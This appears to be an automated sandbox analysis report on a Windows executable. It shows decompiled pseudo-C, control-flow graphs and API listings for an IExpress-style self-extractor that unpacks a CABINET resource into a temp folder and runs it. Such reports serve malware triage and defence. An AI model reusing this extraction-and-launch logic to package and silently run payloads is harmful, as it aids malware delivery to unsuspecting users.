                                                                                                                                                                                                    0x00175b48
                                                                                                                                                                                                    0x00175b4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b4a
                                                                                                                                                                                                    0x00175b0f
                                                                                                                                                                                                    0x00175b16
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b16
                                                                                                                                                                                                    0x00175a7c
                                                                                                                                                                                                    0x00175a8a
                                                                                                                                                                                                    0x00175aa5
                                                                                                                                                                                                    0x00175aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001759bb
                                                                                                                                                                                                    0x001759c0
                                                                                                                                                                                                    0x001759c7
                                                                                                                                                                                                    0x001759d1
                                                                                                                                                                                                    0x001759d6
                                                                                                                                                                                                    0x00175c05
                                                                                                                                                                                                    0x00175c14
                                                                                                                                                                                                    0x00175c14

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001759A8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 001759AF
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00175A13
                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00175A40
                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00175A64
                                                                                                                                                                                                    • memset.MSVCRT ref: 00175A7C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00175A98
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00175AA5
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00175BFC
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                      • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                    • Opcode ID: ec1e5ada2c64fc5e194f5e9221d43e6f955df278550eb36e6aeb676dca05d8e0
                                                                                                                                                                                                    • Instruction ID: 696b6f8c4cf5644687020ae40d6c7ce17e4d9bfa53b34f48d6230ad134b903e1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec1e5ada2c64fc5e194f5e9221d43e6f955df278550eb36e6aeb676dca05d8e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B97192B190060CAFEB159B60CC85BFA77BEEB88344F5484A9F50DD7540DB709EC58B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 374 174fe0-17501a call 17468f FindResourceA LoadResource LockResource 377 175161-175163 374->377 378 175020-175027 374->378 379 175057-17505e call 174efd 378->379 380 175029-175051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 175060-175077 call 1744b9 379->383 384 17507c-1750b4 379->384 380->379 390 175107-17510e 383->390 388 1750b6-1750da 384->388 389 1750e8-175104 call 1744b9 384->389 401 175106 388->401 402 1750dc 388->402 389->401 392 175110-175117 FreeResource 390->392 393 17511d-17511f 390->393 392->393 396 175121-175127 393->396 397 17513a-175141 393->397 396->397 398 175129-175135 call 1744b9 396->398 399 175143-17514a 397->399 400 17515f 397->400 398->397 399->400 404 17514c-175159 SendMessageA 399->404 400->377 401->390 405 1750e3-1750e6 402->405 404->400 405->389 405->401
                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00174FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				struct HWND__* _t9;
                                                                                                                                                                                                    				int _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    				struct HWND__* _t27;
                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t36 = "CABINET";
                                                                                                                                                                                                    				 *0x179144 = E0017468F(_t36, 0, 0);
                                                                                                                                                                                                    				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                    				 *0x179140 = _t8;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					return _t8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t9 =  *0x178584; // 0x0
                                                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                                                    					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                    					ShowWindow(GetDlgItem( *0x178584, 0x841), 5);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t10 = E00174EFD(0, 0);
                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                    					__imp__#20(E00174CA0, E00174CC0, E00174980, E00174A50, E00174AD0, E00174B60, E00174BC0, 1, 0x179148, _t33);
                                                                                                                                                                                                    					_t34 = _t10;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						_t29 =  *0x179148; // 0x0
                                                                                                                                                                                                    						_t24 =  *0x178584; // 0x0
                                                                                                                                                                                                    						E001744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#22(_t34, "*MEMCAB", 0x171140, 0, E00174CD0, 0, 0x179140); // executed
                                                                                                                                                                                                    					_t37 = _t10;
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#23(_t34); // executed
                                                                                                                                                                                                    					if(_t10 != 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 =  *0x178584; // 0x0
                                                                                                                                                                                                    					E001744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_t12 =  *0x179140; // 0x0
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						FreeResource(_t12);
                                                                                                                                                                                                    						 *0x179140 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						_t47 =  *0x1791d8; // 0x0
                                                                                                                                                                                                    						if(_t47 == 0) {
                                                                                                                                                                                                    							E001744B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(( *0x178a38 & 0x00000001) == 0 && ( *0x179a34 & 0x00000001) == 0) {
                                                                                                                                                                                                    						SendMessageA( *0x178584, 0xfa1, _t37, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t37;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
















                                                                                                                                                                                                    0x00174fe0
                                                                                                                                                                                                    0x00174fe6
                                                                                                                                                                                                    0x00174ff9
                                                                                                                                                                                                    0x0017500d
                                                                                                                                                                                                    0x00175013
                                                                                                                                                                                                    0x0017501a
                                                                                                                                                                                                    0x00175163
                                                                                                                                                                                                    0x00175163
                                                                                                                                                                                                    0x00175020
                                                                                                                                                                                                    0x00175027
                                                                                                                                                                                                    0x00175037
                                                                                                                                                                                                    0x00175051
                                                                                                                                                                                                    0x00175051
                                                                                                                                                                                                    0x00175057
                                                                                                                                                                                                    0x0017505e
                                                                                                                                                                                                    0x001750a7
                                                                                                                                                                                                    0x001750ad
                                                                                                                                                                                                    0x001750b4
                                                                                                                                                                                                    0x001750e8
                                                                                                                                                                                                    0x001750e8
                                                                                                                                                                                                    0x001750ee
                                                                                                                                                                                                    0x001750ff
                                                                                                                                                                                                    0x00175104
                                                                                                                                                                                                    0x00175106
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175106
                                                                                                                                                                                                    0x001750cd
                                                                                                                                                                                                    0x001750d3
                                                                                                                                                                                                    0x001750da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001750dd
                                                                                                                                                                                                    0x001750e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175060
                                                                                                                                                                                                    0x00175060
                                                                                                                                                                                                    0x00175070
                                                                                                                                                                                                    0x00175075
                                                                                                                                                                                                    0x00175107
                                                                                                                                                                                                    0x00175107
                                                                                                                                                                                                    0x0017510e
                                                                                                                                                                                                    0x00175111
                                                                                                                                                                                                    0x00175117
                                                                                                                                                                                                    0x00175117
                                                                                                                                                                                                    0x0017511f
                                                                                                                                                                                                    0x00175121
                                                                                                                                                                                                    0x00175127
                                                                                                                                                                                                    0x00175135
                                                                                                                                                                                                    0x00175135
                                                                                                                                                                                                    0x00175127
                                                                                                                                                                                                    0x00175141
                                                                                                                                                                                                    0x00175159
                                                                                                                                                                                                    0x00175159
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017515f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00174FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00175006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0017500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00175030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00175037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0017504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00175051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00175111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00175159
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: cc57e4f791bc5e41ba0fa217f2fa2b893493be0a94921c95df0af8dad5393cb5
                                                                                                                                                                                                    • Instruction ID: 5aba7bde3a8eb0b848b78d97e06beddb03913494f42eb23bb639dec5ffde1e3a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc57e4f791bc5e41ba0fa217f2fa2b893493be0a94921c95df0af8dad5393cb5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C331C8B0780701BFE7205B61AD8DF6B377DBB44756F848424F90EA29A1DBF48CC08661
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 450 172f1d-172f3d 451 172f3f-172f46 450->451 452 172f6c-172f73 call 175164 450->452 454 172f5f-172f66 call 173a3f 451->454 455 172f48 call 1751e5 451->455 460 173041 452->460 461 172f79-172f80 call 1755a0 452->461 454->452 454->460 462 172f4d-172f4f 455->462 465 173043-173053 call 176ce0 460->465 461->460 469 172f86-172fbe GetSystemDirectoryA call 17658a LoadLibraryA 461->469 462->460 463 172f55-172f5d 462->463 463->452 463->454 472 172ff7-173004 FreeLibrary 469->472 473 172fc0-172fd4 GetProcAddress 469->473 474 173017-173024 SetCurrentDirectoryA 472->474 475 173006-17300c 472->475 473->472 476 172fd6-172fee DecryptFileA 473->476 478 173026-17303c call 1744b9 call 176285 474->478 479 173054-17305a 474->479 475->474 477 17300e call 17621e 475->477 476->472 485 172ff0-172ff5 476->485 489 173013-173015 477->489 478->460 481 173065-17306c 479->481 482 17305c call 173b26 479->482 487 17306e-173075 call 17256d 481->487 488 17307c-173089 481->488 491 173061-173063 482->491 485->472 498 17307a 487->498 493 1730a1-1730a9 488->493 494 17308b-173091 488->494 489->460 489->474 491->460 491->481 496 1730b4-1730b7 493->496 497 1730ab-1730ad 493->497 494->493 499 173093 call 173ba2 494->499 496->465 497->496 501 1730af call 174169 497->501 498->488 504 173098-17309a 499->504 501->496 504->460 505 17309c 504->505 505->493
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00172F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = __edx;
                                                                                                                                                                                                    				_t9 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                    				if( *0x178a38 != 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t11 = E00175164(_t52);
                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						return E00176CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t14 = E001755A0(_t53); // executed
                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t45 = 0x105;
                                                                                                                                                                                                    						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                    						_t43 = 0x105;
                                                                                                                                                                                                    						_t40 =  &_v272;
                                                                                                                                                                                                    						E0017658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                    						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                    						if(_t36 != 0) {
                                                                                                                                                                                                    							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                    							_v276 = _t31;
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                    								 *0x17a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                    						_t58 =  *0x178a24 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                    								__eflags =  *0x178a2c - _t44; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									__eflags =  *0x178d48 & 0x000000c0;
                                                                                                                                                                                                    									if(( *0x178d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                    										_t41 =  *0x179a40; // 0x3, executed
                                                                                                                                                                                                    										_t26 = E0017256D(_t41); // executed
                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t22 =  *0x178a24; // 0x0
                                                                                                                                                                                                    									 *0x179a44 = _t44;
                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                    										__eflags =  *0x178a38;
                                                                                                                                                                                                    										if( *0x178a38 == 0) {
                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												E00174169(__eflags);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags =  *0x179a30 - _t22; // 0x0
                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t25 = E00173BA2(); // executed
                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t22 =  *0x178a24; // 0x0
                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t27 = E00173B26(_t40, _t44);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t43 = 0x4bc;
                                                                                                                                                                                                    							E001744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                    							 *0x179124 = E00176285();
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t59 =  *0x179a30 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E0017621E(); // executed
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t49 =  *0x178a24;
                                                                                                                                                                                                    				if( *0x178a24 != 0) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					_t34 = E00173A3F(_t51);
                                                                                                                                                                                                    					_t52 = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E001751E5(_t49) == 0) {
                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t51 =  *0x178a38;
                                                                                                                                                                                                    				if( *0x178a38 != 0) {
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00172f1d
                                                                                                                                                                                                    0x00172f28
                                                                                                                                                                                                    0x00172f2f
                                                                                                                                                                                                    0x00172f3d
                                                                                                                                                                                                    0x00172f6c
                                                                                                                                                                                                    0x00172f6c
                                                                                                                                                                                                    0x00172f71
                                                                                                                                                                                                    0x00172f73
                                                                                                                                                                                                    0x00173041
                                                                                                                                                                                                    0x00173041
                                                                                                                                                                                                    0x00173043
                                                                                                                                                                                                    0x00173053
                                                                                                                                                                                                    0x00173053
                                                                                                                                                                                                    0x00172f79
                                                                                                                                                                                                    0x00172f80
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172f86
                                                                                                                                                                                                    0x00172f86
                                                                                                                                                                                                    0x00172f93
                                                                                                                                                                                                    0x00172f9e
                                                                                                                                                                                                    0x00172fa0
                                                                                                                                                                                                    0x00172fa6
                                                                                                                                                                                                    0x00172fb8
                                                                                                                                                                                                    0x00172fba
                                                                                                                                                                                                    0x00172fbe
                                                                                                                                                                                                    0x00172fc6
                                                                                                                                                                                                    0x00172fcc
                                                                                                                                                                                                    0x00172fd4
                                                                                                                                                                                                    0x00172fd6
                                                                                                                                                                                                    0x00172fd8
                                                                                                                                                                                                    0x00172fe0
                                                                                                                                                                                                    0x00172fe6
                                                                                                                                                                                                    0x00172fee
                                                                                                                                                                                                    0x00172ff0
                                                                                                                                                                                                    0x00172ff5
                                                                                                                                                                                                    0x00172ff5
                                                                                                                                                                                                    0x00172fee
                                                                                                                                                                                                    0x00172fd4
                                                                                                                                                                                                    0x00172ff8
                                                                                                                                                                                                    0x00172ffe
                                                                                                                                                                                                    0x00173004
                                                                                                                                                                                                    0x00173017
                                                                                                                                                                                                    0x0017301c
                                                                                                                                                                                                    0x00173024
                                                                                                                                                                                                    0x00173054
                                                                                                                                                                                                    0x0017305a
                                                                                                                                                                                                    0x00173065
                                                                                                                                                                                                    0x00173065
                                                                                                                                                                                                    0x0017306c
                                                                                                                                                                                                    0x0017306e
                                                                                                                                                                                                    0x00173075
                                                                                                                                                                                                    0x0017307a
                                                                                                                                                                                                    0x0017307a
                                                                                                                                                                                                    0x0017307c
                                                                                                                                                                                                    0x00173081
                                                                                                                                                                                                    0x00173087
                                                                                                                                                                                                    0x00173089
                                                                                                                                                                                                    0x001730a1
                                                                                                                                                                                                    0x001730a1
                                                                                                                                                                                                    0x001730a9
                                                                                                                                                                                                    0x001730ab
                                                                                                                                                                                                    0x001730ad
                                                                                                                                                                                                    0x001730af
                                                                                                                                                                                                    0x001730af
                                                                                                                                                                                                    0x001730ad
                                                                                                                                                                                                    0x001730b6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017308b
                                                                                                                                                                                                    0x0017308b
                                                                                                                                                                                                    0x00173091
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173093
                                                                                                                                                                                                    0x00173098
                                                                                                                                                                                                    0x0017309a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017309c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017309c
                                                                                                                                                                                                    0x00173089
                                                                                                                                                                                                    0x0017305c
                                                                                                                                                                                                    0x00173061
                                                                                                                                                                                                    0x00173063
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173063
                                                                                                                                                                                                    0x0017302b
                                                                                                                                                                                                    0x00173032
                                                                                                                                                                                                    0x0017303c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017303c
                                                                                                                                                                                                    0x00173006
                                                                                                                                                                                                    0x0017300c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017300e
                                                                                                                                                                                                    0x00173015
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173015
                                                                                                                                                                                                    0x00172f80
                                                                                                                                                                                                    0x00172f3f
                                                                                                                                                                                                    0x00172f46
                                                                                                                                                                                                    0x00172f5f
                                                                                                                                                                                                    0x00172f5f
                                                                                                                                                                                                    0x00172f64
                                                                                                                                                                                                    0x00172f66
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172f66
                                                                                                                                                                                                    0x00172f4f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172f55
                                                                                                                                                                                                    0x00172f5d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00172F93
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00172FB2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00172FC6
                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00172FE6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00172FF8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0017301C
                                                                                                                                                                                                      • Part of subcall function 001751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00172F4D,?,00000002,00000000), ref: 00175201
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
